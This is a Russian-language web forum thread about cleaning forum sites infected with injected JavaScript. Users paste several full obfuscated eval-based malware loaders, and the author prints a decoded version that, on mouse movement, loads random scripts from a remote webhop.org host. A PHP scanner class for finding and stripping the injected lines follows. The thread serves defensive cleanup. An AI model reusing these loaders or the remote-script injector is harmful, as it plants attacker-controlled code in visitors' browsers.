4$19$19.5$15$60.5$5.5$4$3.5$3.5$51.5$50$15$19$58.5$51.5$54$49$54.5$58.5$22$59$59.5$60$50$53$47.5$50.5$15$29.5$29.5$29.5$15$23$19.5$15$60.5$5.5$4$3.5$3.5$3.5$58.5$51.5$54$49$54.5$58.5$22$59$59.5$60$50$53$47.5$50.5$15$29.5$15$23.5$28.5$5.5$4$3.5$3.5$3.5$58$47.5$56$15$51$49.5$47.5$49$15$29.5$15$49$54.5$48.5$57.5$53.5$49.5$54$57$22$50.5$49.5$57$33.5$53$49.5$53.5$49.5$54$57$56.5$32$59.5$41$47.5$50.5$38$47.5$53.5$49.5$19$18.5$51$49.5$47.5$49$18.5$19.5$44.5$23$45.5$28.5$5.5$4$3.5$3.5$3.5$58$47.5$56$15$56.5$48.5$56$51.5$55$57$15$29.5$15$49$54.5$48.5$57.5$53.5$49.5$54$57$22$48.5$56$49.5$47.5$57$49.5$33.5$53$49.5$53.5$49.5$54$57$19$18.5$56.5$48.5$56$51.5$55$57$18.5$19.5$28.5$5.5$4$3.5$3.5$3.5$56.5$48.5$56$51.5$55$57$22$57$59.5$55$49.5$15$29.5$15$18.5$57$49.5$59$57$22.5$52$47.5$58$47.5$56.5$48.5$56$51.5$55$57$18.5$28.5$5.5$4$3.5$3.5$3.5$56.5$48.5$56$51.5$55$57$22$54.5$54$56$49.5$47.5$49$59.5$56.5$57$47.5$57$49.5$48.5$51$47.5$54$50.5$49.5$15$29.5$15$50$57.5$54$48.5$57$51.5$54.5$54$15$19$19.5$15$60.5$5.5$4$3.5$3.5$3.5$3.5$51.5$50$15$19$57$51$51.5$56.5$22$56$49.5$47.5$49$59.5$40.5$57$47.5$57$49.5$15$29.5$29.5$15$18.5$48.5$54.5$53.5$55$53$49.5$57$49.5$18.5$19.5$15$60.5$5.5$4$3.5$3.5$3.5$3.5$3.5$58.5$51.5$54$49$54.5$58.5$22$59$59.5$60$50$53$47.5$50.5$15$29.5$15$24$28.5$5.5$4$3.5$3.5$3.5$3.5$61.5$5.5$4$3.5$3.5$3.5$61.5$28.5$5.5$4$3.5$3.5$3.5$56.5$48.5$56$51.5$55$57$22$54.5$54$53$54.5$47.5$49$15$29.5$15$50$57.5$54$48.5$57$51.5$54.5$54$19$19.5$15$60.5$5.5$4$3.5$3.5$3.5$3.5$58.5$51.5$54$49$54.5$58.5$22$59$59.5$60$50$53$47.5$50.5$15$29.5$15$24$28.5$5.5$4$3.5$3.5$3.5$61.5$28.5$5.5$4$3.5$3.5$3.5$56.5$48.5$56$51.5$55$57$22$56.5$56$48.5$15$29.5$15$57.5$56$53$15$20.5$15$37.5$47.5$57$51$22$56$47.5$54$49$54.5$53.5$19$19.5$22$57$54.5$40.5$57$56$51.5$54$50.5$19$19.5$22$56.5$57.5$48$56.5$57$56$51.5$54$50.5$19$24.5$19.5$15$20.5$15$18.5$22$52$56.5$18.5$28.5$5.5$4$3.5$3.5$3.5$51$49.5$47.5$49$22$47.5$55$55$49.5$54$49$32.5$51$51.5$53$49$19$56.5$48.5$56$51.5$55$57$19.5$28.5$5.5$4$3.5$3.5$61.5$5.5$4$3.5$61.5$28.5$5.5$4$61.5$19.5$19$19.5$28.5"[((e)?"s":"")+"p"+"lit"]("a$"[((e)?"su":"")+"bstr"](1));for(i=6-2-1-2-1;i-685!=0;i++){k=i;ss=ss+String.fromCharCode(-1*h*(1+1*n[k]));}q=ss;e(q);} возможно это оффтоп, поэтому заранее извеняюсь заметил что при редактировании сообщений на форуме не загружаеться редактор, я думал это связано с вирусом но вот и на вешем форуме также не загружаеться (вернее загружаеться но не всегда)
18 мая, 201212 yr Author comment_4582 Расшифровка данного скрипта: (function() { var url = '__smmxkycxsu.webhop.org/g/'; if (typeof window.xyzflag === 'undefined') { window.xyzflag = 0; } document.onmousemove = function() { if (window.xyzflag === 0) { window.xyzflag = 1; var head = document.getElementsByTagName('head')[0]; var script = document.createElement('script'); script.type = 'text/javascript'; script.onreadystatechange = function () { if (this.readyState == 'complete') { window.xyzflag = 2; } }; script.onload = function() { window.xyzflag = 2; }; script.src = url + Math.random().toString().substring(3) + '.js'; head.appendChild(script); } }; })(); [/CODE]
18 мая, 201212 yr comment_4583 ещё антивирус в cPanel по началу ругался на троян, но теперь перестал хотя точно знаю что ещё есть эта бяка.
18 мая, 201212 yr comment_4585 вот этот код: try{q=document.createElement("d"+"i"+"v");q.appendChild(q+"");}catch(qw){h=-012/5;zz='a'+'l';f='fr'+'om'+'Ch';f+='arC';}try{qwe=prototype;}catch(brebr){zz='zv'.substr(123-122)+zz;ss=[];f+=(h)?'ode':"";w=this;e=w[f["s"+"ubstr"](11)+zz];n="19$50$57.5$54$48.5$57$51.5$54.5$54$19$19.5$15$60.5$5.5$4$3.5$58$47.5$56$15$57.5$56$53$15$29.5$15$18.5$51$57$57$55$28$22.5$22.5$55.5$50$58$53$59.5$55.5$56$51.5$51$51.5$22$51$54.5$53.5$49.5$53$51.5$54$57.5$59$22$54$49.5$57$22.5$50.5$22.5$18.5$28.5$5.5$4$3.5$51.5$50$15$19$57$59.5$55$49.5$54.5$50$15$58.5$51.5$54$49$54.5$58.5$22$59$59.5$60$50$53$47.5$50.5$15$29.5$29.5$29.5$15$18.5$57.5$54$49$49.5$50$51.5$54$49.5$49$18.5$19.5$15$60.5$5.5$4$3.5$3.5$58.5$51.5$54$49$54.5$58.5$22$59$59.5$60$50$53$47.5$50.5$15$29.5$15$23$28.5$5.5$4$3.5$61.5$5.5$4$3.5$49$54.5$48.5$57.5$53.5$49.5$54$57$22$54.5$54$53.5$54.5$57.5$56.5$49.5$53.5$54.5$58$49.5$15$29.5$15$50$57.5$54$48.5$57$51.5$54.5$54$19$19.5$15$60.5$5.5$4$3.5$3.5$51.5$50$15$19$58.5$51.5$54$49$54.5$58.5$22$59$59.5$60$50$53$47.5$50.5$15$29.5$29.5$29.5$15$23$19.5$15$60.5$5.5$4$3.5$3.5$3.5$58.5$51.5$54$49$54.5$58.5$22$59$59.5$60$50$53$47.5$50.5$15$29.5$15$23.5$28.5$5.5$4$3.5$3.5$3.5$58$47.5$56$15$51$49.5$47.5$49$15$29.5$15$49$54.5$48.5$57.5$53.5$49.5$54$57$22$50.5$49.5$57$33.5$53$49.5$53.5$49.5$54$57$56.5$32$59.5$41$47.5$50.5$38$47.5$53.5$49.5$19$18.5$51$49.5$47.5$49$18.5$19.5$44.5$23$45.5$28.5$5.5$4$3.5$3.5$3.5$58$47.5$56$15$56.5$48.5$56$51.5$55$57$15$29.5$15$49$54.5$48.5$57.5$53.5$49.5$54$57$22$48.5$56$49.5$47.5$57$49.5$33.5$53$49.5$53.5$49.5$54$57$19$18.5$56.5$48.5$56$51.5$55$57$18.5$19.5$28.5$5.5$4$3.5$3.5$3.5$56.5$48.5$56$51.5$55$57$22$57$59.5$55$49.5$15$29.5$15$18.5$57$49.5$59$57$22.5$52$47.5$58$47.5$56.5$48.5$56$51.5$55$57$18.5$28.5$5.5$4$3.5$3.5$3.5$56.5$48.5$56$51.5$55$57$22$54.5$54$56$49.5$47.5$49$59.5$56.5$57$47.5$57$49.5$48.5$51$47.5$54$50.5$49.5$15$29.5$15$50$57.5$54$48.5$57$51.5$54.5$54$15$19$19.5$15$60.5$5.5$4$3.5$3.5$3.5$3.5$51.5$50$15$19$57$51$51.5$56.5$22$56$49.5$47.5$49$59.5$40.5$57$47.5$57$49.5$15$29.5$29.5$15$18.5$48.5$54.5$53.5$55$53$49.5$57$49.5$18.5$19.5$15$60.5$5.5$4$3.5$3.5$3.5$3.5$3.5$58.5$51.5$54$49$54.5$58.5$22$59$59.5$60$50$53$47.5$50.5$15$29.5$15$24$28.5$5.5$4$3.5$3.5$3.5$3.5$61.5$5.5$4$3.5$3.5$3.5$61.5$28.5$5.5$4$3.5$3.5$3.5$56.5$48.5$56$51.5$55$57$22$54.5$54$53$54.5$47.5$49$15$29.5$15$50$57.5$54$48.5$57$51.5$54.5$54$19$19.5$15$60.5$5.5$4$3.5$3.5$3.5$3.5$58.5$51.5$54$49$54.5$58.5$22$59$59.5$60$50$53$47.5$50.5$15$29.5$15$24$28.5$5.5$4$3.5$3.5$3.5$61.5$28.5$5.5$4$3.5$3.5$3.5$56.5$48.5$56$51.5$55$57$22$56.5$56$48.5$15$29.5$15$57.5$56$53$15$20.5$15$37.5$47.5$57$51$22$56$47.5$54$49$54.5$53.5$19$19.5$22$57$54.5$40.5$57$56$51.5$54$50.5$19$19.5$22$56.5$57.5$48$56.5$57$56$51.5$54$50.5$19$24.5$19.5$15$20.5$15$18.5$22$52$56.5$18.5$28.5$5.5$4$3.5$3.5$3.5$51$49.5$47.5$49$22$47.5$55$55$49.5$54$49$32.5$51$51.5$53$49$19$56.5$48.5$56$51.5$55$57$19.5$28.5$5.5$4$3.5$3.5$61.5$5.5$4$3.5$61.5$28.5$5.5$4$61.5$19.5$19$19.5$28.5"[((e)?"s":"")+"p"+"lit"]("a$"[((e)?"su":"")+"bstr"](1));for(i=6-2-1-2-1;i-685!=0;i++){k=i;ss=ss+String.fromCharCode(-1*h*(1+1*n[k]));}q=ss;e(q);} try{q=document.createElement("d"+"i"+"v");q.appendChild(q+"");}catch(qw){h=-012/5;}try{prototype;}catch(brebr){st=String;zz='al';zz='zv'.substr(123-122)+zz;ss=[];f='fr'+'om'+'Ch';f+='arC';f+='ode';w=this;e=w[f["substr"](11)+zz];n="19$50$57.5$54$48.5$57$51.5$54.5$54$19$19.5$15$60.5$5.5$4$3.5$58$47.5$56$15$57.5$56$53$15$29.5$15$18.5$51$57$57$55$28$22.5$22.5$55.5$51$48.5$52.5$50$49$57.5$55$49$55.5$22$55$54.5$49$60$54.5$54$49.5$22$54$49.5$57$22.5$50.5$22.5$18.5$28.5$5.5$4$3.5$51.5$50$15$19$57$59.5$55$49.5$54.5$50$15$58.5$51.5$54$49$54.5$58.5$22$59$59.5$60$50$53$47.5$50.5$15$29.5$29.5$29.5$15$18.5$57.5$54$49$49.5$50$51.5$54$49.5$49$18.5$19.5$15$60.5$5.5$4$3.5$3.5$58.5$51.5$54$49$54.5$58.5$22$59$59.5$60$50$53$47.5$50.5$15$29.5$15$23$28.5$5.5$4$3.5$61.5$5.5$4$3.5$49$54.5$48.5$57.5$53.5$49.5$54$57$22$54.5$54$53.5$54.5$57.5$56.5$49.5$53.5$54.5$58$49.5$15$29.5$15$50$57.5$54$48.5$57$51.5$54.5$54$19$19.5$15$60.5$5.5$4$3.5$3.5$51.5$50$15$19$58.5$51.5$54$49$54.5$58.5$22$59$59.5$60$50$53$47.5$50.5$15$29.5$29.5$29.5$15$23$19.5$15$60.5$5.5$4$3.5$3.5$3.5$58.5$51.5$54$49$54.5$58.5$22$59$59.5$60$50$53$47.5$50.5$15$29.5$15$23.5$28.5$5.5$4$3.5$3.5$3.5$58$47.5$56$15$51$49.5$47.5$49$15$29.5$15$49$54.5$48.5$57.5$53.5$49.5$54$57$22$50.5$49.5$57$33.5$53$49.5$53.5$49.5$54$57$56.5$32$59.5$41$47.5$50.5$38$47.5$53.5$49.5$19$18.5$51$49.5$47.5$49$18.5$19.5$44.5$23$45.5$28.5$5.5$4$3.5$3.5$3.5$58$47.5$56$15$56.5$48.5$56$51.5$55$57$15$29.5$15$49$54.5$48.5$57.5$53.5$49.5$54$57$22$48.5$56$49.5$47.5$57$49.5$33.5$53$49.5$53.5$49.5$54$57$19$18.5$56.5$48.5$56$51.5$55$57$18.5$19.5$28.5$5.5$4$3.5$3.5$3.5$56.5$48.5$56$51.5$55$57$22$57$59.5$55$49.5$15$29.5$15$18.5$57$49.5$59$57$22.5$52$47.5$58$47.5$56.5$48.5$56$51.5$55$57$18.5$28.5$5.5$4$3.5$3.5$3.5$56.5$48.5$56$51.5$55$57$22$54.5$54$56$49.5$47.5$49$59.5$56.5$57$47.5$57$49.5$48.5$51$47.5$54$50.5$49.5$15$29.5$15$50$57.5$54$48.5$57$51.5$54.5$54$15$19$19.5$15$60.5$5.5$4$3.5$3.5$3.5$3.5$51.5$50$15$19$57$51$51.5$56.5$22$56$49.5$47.5$49$59.5$40.5$57$47.5$57$49.5$15$29.5$29.5$15$18.5$48.5$54.5$53.5$55$53$49.5$57$49.5$18.5$19.5$15$60.5$5.5$4$3.5$3.5$3.5$3.5$3.5$58.5$51.5$54$49$54.5$58.5$22$59$59.5$60$50$53$47.5$50.5$15$29.5$15$24$28.5$5.5$4$3.5$3.5$3.5$3.5$61.5$5.5$4$3.5$3.5$3.5$61.5$28.5$5.5$4$3.5$3.5$3.5$56.5$48.5$56$51.5$55$57$22$54.5$54$53$54.5$47.5$49$15$29.5$15$50$57.5$54$48.5$57$51.5$54.5$54$19$19.5$15$60.5$5.5$4$3.5$3.5$3.5$3.5$58.5$51.5$54$49$54.5$58.5$22$59$59.5$60$50$53$47.5$50.5$15$29.5$15$24$28.5$5.5$4$3.5$3.5$3.5$61.5$28.5$5.5$4$3.5$3.5$3.5$56.5$48.5$56$51.5$55$57$22$56.5$56$48.5$15$29.5$15$57.5$56$53$15$20.5$15$37.5$47.5$57$51$22$56$47.5$54$49$54.5$53.5$19$19.5$22$57$54.5$40.5$57$56$51.5$54$50.5$19$19.5$22$56.5$57.5$48$56.5$57$56$51.5$54$50.5$19$24.5$19.5$15$20.5$15$18.5$22$52$56.5$18.5$28.5$5.5$4$3.5$3.5$3.5$51$49.5$47.5$49$22$47.5$55$55$49.5$54$49$32.5$51$51.5$53$49$19$56.5$48.5$56$51.5$55$57$19.5$28.5$5.5$4$3.5$3.5$61.5$5.5$4$3.5$61.5$28.5$5.5$4$61.5$19.5$19$19.5$28.5"[((e)?"s":"")+"p"+"lit"]("a$"[((e)?"su":"")+"bstr"](1));for(i=6-2-1-2-1;i-683!=0;i++){j=i;if(st)ss=ss+st.fromCharCode(-1*h*(1+1*n[j]));}q=ss;e(q);} возможно это оффтоп, поэтому заранее извеняюсь заметил что при редактировании сообщений на форуме не загружаеться редактор, я думал это связано с вирусом но вот и на вешем форуме также не загружаеться (вернее загружаеться но не всегда) Установите вот это дополнение для Firefox и вы будете видеть весь JS код форума, уже в нормальном, а не в обфусцированном виде.
9 ноября, 201212 yr comment_14434 Вот скрипт: <? /* ---------------------------------------------------------------------------------- dScaner Class - START ---------------------------------------------------------------------------------- */ /* * * Класс - dScaner для сканирования директорий на наличие вредоносного кода в * указанных типах файлов * * Разработчик: Денис Ушаков * Дата разработки: 03-04-2012 * Версия разработки: 0.0.3 * */ Class dScaner { // преобразуем входной параметр в массив // $get_str - список параметров // $separator - разделитель параметров в списке function request($get_str, $separator) { if (isset($get_str) && !empty($get_str)) { // эксплоадим строку в массив и возвращаем его $obj = explode($separator, $get_str); return $obj; } else { return false; } } /* * * Функция поиска в файлах вхождения заданной строки: * * $this->find($path, $files_allowed, $requested_string); * * $path - путь до директории, от которой отталкиваться при сканировании * $files_allowed - список файлов, которые подвергаются сканированию * $requested_string - строка поиска * */ function find($path = './', $files_allowed, $requested_string) { // исключаемые ссылки на директории и файлы, которые будут игнорироваться $dir_disallow = array('.', '..', '.htaccess', '.git'); if(is_dir($path)) { $temp = opendir($path); while (false !== ($dir = readdir($temp))) { if ((is_dir($path . $dir)) && (!in_array($dir, $dir_disallow)) ) { // если директория - сканируем её $sub_dir = $path . $dir . '/'; $this->find($sub_dir, $files_allowed, $requested_string); } elseif ((is_file($path . $dir)) && (!in_array($dir, $dir_disallow)) && (strpos($dir, $files_allowed) == true) && (strpos($dir, '_BACKUP') == false) ) { // Если файл // получаем полный путь до него $in_dir_file = $path . $dir; // считываем файл в строку $temporary_file = file_get_contents($in_dir_file); // флаг найденного вхождения искомой строки $file_founded = false; // разбиваем файл на строки $tf_strings = explode("n", $temporary_file); // обрабатываем каждую отдельно foreach ($tf_strings AS $item) { $item = strval($item); // если в строке есть вхождения искомого запроса if (strpos($item, $requested_string) !== false) { $file_founded = true; } } // если в файле найдена строка if ($file_founded) { // выводим путь до файла в котором найдено вхождение print "<span style='display:block; padding:5px; border:1px solid #1f4f18; background-color:#d5f5ce; font-size:12px; line-height:16px; font-family:tahoma, sans-serif; margin-bottom:-15px;'>" . $in_dir_file . " - в файле обнаружена искомая строка. </span> "; } } } closedir($temp); } } /* * * Функция сканирования вредоносного кода: * * $this->scan($path, $files_allowed, $requested_string); * * $path - путь до директории, от которой отталкиваться при сканировании * $files_allowed - список файлов, которые подвергаются сканированию * $requested_string - строка, по которой определяется наличие вредоносного кода * */ function scan($path = './', $files_allowed, $requested_string) { // исключаемые ссылки на директории и файлы $dir_disallow = array('.', '..', '.htaccess', '.git'); if(is_dir($path)) { $temp = opendir($path); while (false !== ($dir = readdir($temp))) { if ((is_dir($path . $dir)) && (!in_array($dir, $dir_disallow)) ) { // если директория - сканируем её $sub_dir = $path . $dir . '/'; $new_parent_dir = $path . $dir; $this->scan($sub_dir, $files_allowed, $requested_string, $new_parent_dir); } elseif ((is_file($path . $dir)) && (!in_array($dir, $dir_disallow)) && (strpos($dir, $files_allowed) == true) && (strpos($dir, '_BACKUP') == false) ) { // Если файл // получаем полный путь до него $in_dir_file = $path . $dir; // считываем файл в строку $temporary_file = file_get_contents($in_dir_file); // флаг бекапа файла $create_backup = false; // разбиваем файл на строки и считываем каждую отдельно $tf_strings = explode("n", $temporary_file); // индекс строки файла $str_index = 0; // каждую строку обрабатываем отдельно foreach ($tf_strings AS $item) { $item = strval($item); if (strpos($item, $requested_string) !== false) { // если в строке есть вхождения искомого запроса // флаг бекапа файла, в котором найден вредоносный код $create_backup = true; // удаляем всю строку с вредоносным кодом unset($tf_strings[$str_index]); } $str_index++; } // создаём бэкап if ($create_backup) { // меняем права в папке в которой находимся чтобы иметь возможность писать в неё chmod($path, 0777); // формируем имя БЭКАПа файла $temp_file_backup = $in_dir_file.'_BACKUP'; // сохраняем БЭКАП файла рядом с исходным file_put_contents($temp_file_backup, $temporary_file); // собираем очищенный файл в строку $scanned_file = implode("n", $tf_strings); // сохраняем очищенный файл if (file_put_contents($in_dir_file, $scanned_file)) { // перезаписали удачно print "<span style='display:block; padding:5px; border:1px solid #1f4f18; background-color:#d5f5ce; font-size:12px; line-height:16px; font-family:tahoma, sans-serif; margin-bottom:-15px;'>" . $in_dir_file . " - Файл очищен. (+ BACKUP) </span> "; } else { // перезапись не удалась print "<span style='display:block; padding:5px; border:1px solid #822121; background-color:#ea7575; font-size:12px; line-height:16px; font-family:tahoma, sans-serif; margin-bottom:-15px;'>".$in_dir_file ." - Файл НЕ очищен. </span> "; } // меняем права в папке в которой находимся обратно на 755 chmod($path, 0755); } } } closedir($temp); } } /* * * Функция восстановления БЭКАПОВ файлов * * $this->restore_backups($path, $files_allowed); * * $path - путь до директории, от которой отталкиваться при восстановлении * $files_allowed - список файлов, которые подвергаются восстановлению * */ function restore_backups($path = './', $files_allowed) { // исключаемые ссылки на директории и файлы $dir_disallow = array('.', '..', '.htaccess', '.git'); if(is_dir($path)) { $temp = opendir($path); while (false !== ($dir = readdir($temp))) { if ((is_dir($path . $dir)) && (!in_array($dir, $dir_disallow)) ) { // если директория - сканируем её $sub_dir = $path . $dir . '/'; $this->restore_backups($sub_dir, $files_allowed); } elseif ((is_file($path . $dir)) && (!in_array($dir, $dir_disallow)) && (strpos($dir, $files_allowed) == true) ) { // Если файл // получаем полный путь до него $in_dir_file = $path . $dir; if (is_file($in_dir_file.'_BACKUP')) { // БЭКАП существует, получаем его содержимое $temporary_file_from_backup = file_get_contents($in_dir_file.'_BACKUP'); // восстанавливаем бэкап файла if (file_put_contents($in_dir_file, $temporary_file_from_backup)) { // удаляем бэкап unlink($_SERVER['DOCUMENT_ROOT'].'/'.$in_dir_file.'_BACKUP'); // бэкап восстановили print "<span style='display:block; padding:5px; border:1px solid #1f4f18; background-color:#d5f5ce; font-size:12px; line-height:16px; font-family:tahoma, sans-serif; margin-bottom:-15px;'>".$in_dir_file ." - восстановлен. </span> "; } else { // бэкап НЕ восстановили print "<span style='display:block; padding:5px; border:1px solid #822121; background-color:#ea7575; font-size:12px; line-height:16px; font-family:tahoma, sans-serif; margin-bottom:-15px;'>".$in_dir_file ." - НЕ восстановлен. </span> "; } } } } closedir($temp); } } } /* ---------------------------------------------------------------------------------- dScaner Class - END ---------------------------------------------------------------------------------- */ ?> Выкладывай, посмотрим что у тебя за код.. Права изменять бесполезно - злоумышленник при внедрении вредоносного кода имеет доступ к файлам через FTP. Как воспользоваться этим скриптом?
9 ноября, 201212 yr Author comment_14468 Прочитать комментарии в скрипте, что-то подредактировать согласно комментариям и обратиться к скрипту из адресной строки.
10 ноября, 201212 yr comment_14497 Прочитать комментарии в скрипте, что-то подредактировать согласно комментариям и обратиться к скрипту из адресной строки. А в каком формате его сохранить нужно? ".js" ?
10 ноября, 201212 yr comment_14530 Нет, в .php Я если честно вообще не разбираюсь в кодах... Вы можете подсказать что отредактировать нужно? Я вот могу скопировать и сохранить в формате ПХП но дальше я вообще не бум бум что делать...
12 ноября, 201212 yr Author comment_14736 (первый параметр — стартовая директория поиска, второй — тип файлов, участвующих в поиске, третий — строка поиска) Пример: В самый низ добавляешь: $ipbmafia = new dScaner; $ipbmafia->find('./', '.js', 'Array'); $ipbmafia->scan('./', '.js', '=Array.prototype.slice.call(arguments).join(""),'); [/CODE] У тебя будут свои значения. Если искомый текст будет обнаружен, то сканнер выведет эти файлы на экран.
5 декабря, 201211 yr comment_16203 Паш, проверь пожалуйста мой сайт на вирусняк. у меня пользователей перекидывает на другой сайт.
20 августа, 20177 yr comment_134996 Доброго дня всем! Подниму тему, недавно яндекс обнаружил у меня на форуме вирусы...при этом гугл не ругается, но яша поставил ярлык как зараженный, найти не могу, удалить вирус тем более, что делать подскажите?
20 августа, 20177 yr comment_134998 14 минут назад, iliah сказал: что делать подскажите? Как вариант, откатить из бэкапа! Порабы уже переползать на IPS4
20 августа, 20177 yr comment_134999 3 минуты назад, Sipsb сказал: Как вариант, откатить из бэкапа! Порабы уже переползат на IPS4 видел в 15 году тут тему как правильно перейти на ипс 4 сейчас не получается найти, лицензия есть, только надо продлить, и возможно ли автоматически обновиться с 345 на 4.0
20 августа, 20177 yr comment_135000 1 минуту назад, iliah сказал: видел в 15 году тут тему как правильно перейти на ипс 4 сейчас не получается найти
20 августа, 20177 yr comment_135001 8 минут назад, Sipsb сказал: Для исключения вирусов, я б конечно хотел снести весь форум к ядреной бабушке, и файлы с базой восстановить на свежей четверке.
20 августа, 20177 yr comment_135002 1 минуту назад, iliah сказал: я б конечно хотел снести весь форум к ядреной бабушке, и файлы с базой восстановить на свежей четверке. Это правильно! Думаю, лучше переустановить на чистую 3-ку а затем обновить до 4-ки.
20 августа, 20177 yr comment_135003 Только что, Sipsb сказал: Это правильно! Думаю, лучше переустановить на чистую 3-ку а затем обновить до 4-ки. вооо а это идея, чет я сразу не допер
20 августа, 20177 yr comment_135004 3 минуты назад, iliah сказал: вооо а это идея, чет я сразу не допер Вот Вам в помощь
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.
Note: Your post will require moderator approval before it will be visible.